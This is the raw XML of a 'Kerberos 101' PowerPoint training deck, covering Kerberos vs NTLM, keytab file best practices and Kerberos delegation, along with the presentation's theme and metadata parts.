                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Doesn’t support transitive trusts</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Supports transitive trusts</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos vs NTLM authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133774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dirty="0"/>
              <a:t>Keytab Files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 1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935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a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Definition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="8343786" cy="4062651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Containing pairs of Kerberos principals and encrypted keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be created with KTPass.exe on Windows or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ktutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>All you need to know about Keytab files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Interact with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>keytab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> on Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Keytab File parser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Best practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Track the creation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>keytab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t use RC4 as it stored the NTLM password hash in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>keytab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change them on a regular basis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An authoritative restore increases the KVNO of the password with disables all the existing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>keytab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> files so does a password reset even if you use the same password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keytab Files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270147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Lab 6: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Keytab</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See the document “Kerberos Lab Instructions”</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keytab Files Lab</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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459647"/>
            <a:ext cx="2149267" cy="2149267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184076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dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unconstraint Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="126443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a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need for Kerberos Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3585597"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multi-tier applications: A client might connect to a server that must itself connect to a second server on the back end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automation like PowerShell Remoting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Kerberos protocol deals with this situation through a mechanism called delegation of authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Client delegates authentication to a server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proxy tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forwarded tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unconstrained delegation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constrained delegation extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protocol transition extension</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22063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a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is Classical unconstrained Kerberos Delegation?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3785652"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Classical delegation of authentication allows the client to send its identity as a Kerberos ticket (TGT) to the front-end server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delegation is not limited to a single pair of a front-end and a back-end server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delegation is configured on the accounts that should be able to delegate and on the account that is allowed to be delegated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are three requirements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All machines must be part of one AD Forest (prior to 2012)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The client's account must be enabled for delegation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The service's account must be enabled for delegation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230808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PC2010_breakout_arcguide[1]">
  <a:themeElements>
    <a:clrScheme name="MCS">
      <a:dk1>
        <a:srgbClr val="595959"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="0070C0"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="DDDDDD"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="5191CD"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="2D86E7"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="A4D7F4"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="7AA23A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FFC211"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="C94409"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="5191CD"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="595959"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="MCS">
      <a:majorFont>
        <a:latin typeface="Segoe Light"/>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4841CDF763FA84FA6AA2869B2C7012F" ma:contentTypeVersion="0" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="75e40ce0403a3360a6961d930d95c02b">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E41B89E-58DC-4775-A47C-6348015073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24ACB71-ADC8-47C8-AA1E-A85A7FFAA670}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CB5ED31B-D413-458D-8B4C-08DBBC15B7AE}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControl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01DFSN_tobkat_new slide deck</Template>
  <TotalTime>11511</TotalTime>
  <Words>35695</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>3164</Paragraphs>
  <Slides>151</Slides>
  <Notes>151</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3</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>151</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="169" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Cambria Math</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Lucida Sans Typewriter</vt:lpstr>
      <vt:lpstr>Segoe</vt:lpstr>
      <vt:lpstr>Segoe Light</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Segoe UI Light</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>1_Custom Design</vt:lpstr>
      <vt:lpstr>WPC2010_breakout_arcguide[1]</vt:lpstr>
      <vt:lpstr>Image</vt:lpstr>
      <vt:lpstr>Acrobat Document</vt:lpstr>
      <vt:lpstr>Packager Shell Object</vt:lpstr>
      <vt:lpstr>Kerberos 101</vt:lpstr>
      <vt:lpstr>Kerberos 101</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>This content is based on...</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Kerberos Protocol</vt:lpstr>
      <vt:lpstr>Session Key Distribution Problem</vt:lpstr>
      <vt:lpstr>Session Key Distribution Solution</vt:lpstr>
      <vt:lpstr>Kerberos Protocol</vt:lpstr>
      <vt:lpstr>Kerberos Protocol</vt:lpstr>
      <vt:lpstr>Kerberos Protocol</vt:lpstr>
      <vt:lpstr>Kerberos Overview</vt:lpstr>
      <vt:lpstr>Kerberos Overview</vt:lpstr>
      <vt:lpstr>Kerberos Overview</vt:lpstr>
      <vt:lpstr>Kerberos Overview</vt:lpstr>
      <vt:lpstr>Kerberos Overview</vt:lpstr>
      <vt:lpstr>Identification, Authentication, Authorization</vt:lpstr>
      <vt:lpstr>Impersonation vs Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Protocol</vt:lpstr>
      <vt:lpstr>Kerberos Protocol</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Protocol</vt:lpstr>
      <vt:lpstr>Physical Structure</vt:lpstr>
      <vt:lpstr>Kerberos Physical Structure</vt:lpstr>
      <vt:lpstr>Kerberos Physical Structure</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Kerberos Physical Structure</vt:lpstr>
      <vt:lpstr>Kerberos Physical Structure</vt:lpstr>
      <vt:lpstr>Kerberos Physical Structure</vt:lpstr>
      <vt:lpstr>Kerberos Physical Structure</vt:lpstr>
      <vt:lpstr>Kerberos Physical Structure</vt:lpstr>
      <vt:lpstr>Kerberos Physical Structure</vt:lpstr>
      <vt:lpstr>Kerberos Physical Structure</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>How to use WireShark</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Why Kerberos?</vt:lpstr>
      <vt:lpstr>Why Kerberos?</vt:lpstr>
      <vt:lpstr>Kerberos Golden Rules</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Limitations and common registry settings</vt:lpstr>
      <vt:lpstr>Limitations and common registry settings</vt:lpstr>
      <vt:lpstr>Limitations and common registry settings</vt:lpstr>
      <vt:lpstr>Limitations and common registry settings</vt:lpstr>
      <vt:lpstr>Limitations and common registry settings</vt:lpstr>
      <vt:lpstr>Limitations and common registry settings</vt:lpstr>
      <vt:lpstr>Limitations and common registry settings</vt:lpstr>
      <vt:lpstr>Limitations and common registry settings</vt:lpstr>
      <vt:lpstr>Cross Realm Authentication</vt:lpstr>
      <vt:lpstr>Cross-Realm Authentication</vt:lpstr>
      <vt:lpstr>Cross-Realm Authentication</vt:lpstr>
      <vt:lpstr>Cross-Realm Authentication</vt:lpstr>
      <vt:lpstr>Cross-Realm Authentication</vt:lpstr>
      <vt:lpstr>Cross-Realm Authentication</vt:lpstr>
      <vt:lpstr>Cross-Realm Authentication</vt:lpstr>
      <vt:lpstr>Cross-Realm Authentication</vt:lpstr>
      <vt:lpstr>NTLM</vt:lpstr>
      <vt:lpstr>When does Kerberos not work?</vt:lpstr>
      <vt:lpstr>NTLM</vt:lpstr>
      <vt:lpstr>NTLM – Hash Methods</vt:lpstr>
      <vt:lpstr>NTLM - Configuration</vt:lpstr>
      <vt:lpstr>NTLM – Message Flow (domain user)</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Kerberos vs NTLM authentication</vt:lpstr>
      <vt:lpstr>Kerberos vs NTLM authentication</vt:lpstr>
      <vt:lpstr>Keytab Files</vt:lpstr>
      <vt:lpstr>Keytab Files</vt:lpstr>
      <vt:lpstr>Keytab Files Lab</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Using Kerberos for web authentication</vt:lpstr>
      <vt:lpstr>Using Kerberos for web authentication</vt:lpstr>
      <vt:lpstr>Important: Using Kerberos for web authentication</vt:lpstr>
      <vt:lpstr>Kerberos Delegation Troubleshooting</vt:lpstr>
      <vt:lpstr>Using Kerberos for web authentication</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Processes and Interactions</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Kerberos Protocol</vt:lpstr>
      <vt:lpstr>Kerberos Troubleshooting</vt:lpstr>
      <vt:lpstr>Kerberos Vulnerabilities</vt:lpstr>
      <vt:lpstr>Vulnarabilities</vt:lpstr>
      <vt:lpstr>Vulnarabilities</vt:lpstr>
      <vt:lpstr>Vulnarabilities</vt:lpstr>
      <vt:lpstr>Appendix</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>NTLM – NEGOTIATE_MESSAGE</vt:lpstr>
      <vt:lpstr>NTLM – CHALLENGE_MESSAGE</vt:lpstr>
      <vt:lpstr>NTLM – AUTHENTICATE_MESSAGE</vt:lpstr>
      <vt:lpstr>NTLM – AUTHENTICATE_MESSAGE (continued)</vt:lpstr>
      <vt:lpstr>Default Timeouts</vt:lpstr>
      <vt:lpstr>Resolving Kerberos Codes in Events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Kerberos 101</dc:title>
  <dc:creator>Raimund Andree</dc:creator>
  <cp:keywords>Kerberos</cp:keywords>
  <cp:lastModifiedBy>Raimund Andrée</cp:lastModifiedBy>
  <cp:revision>1265</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-01-29T01:53:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-04T08:25:15Z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0x01010014841CDF763FA84FA6AA2869B2C7012F</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raandree@microsoft.com</vt:lpwstr>
  </property>
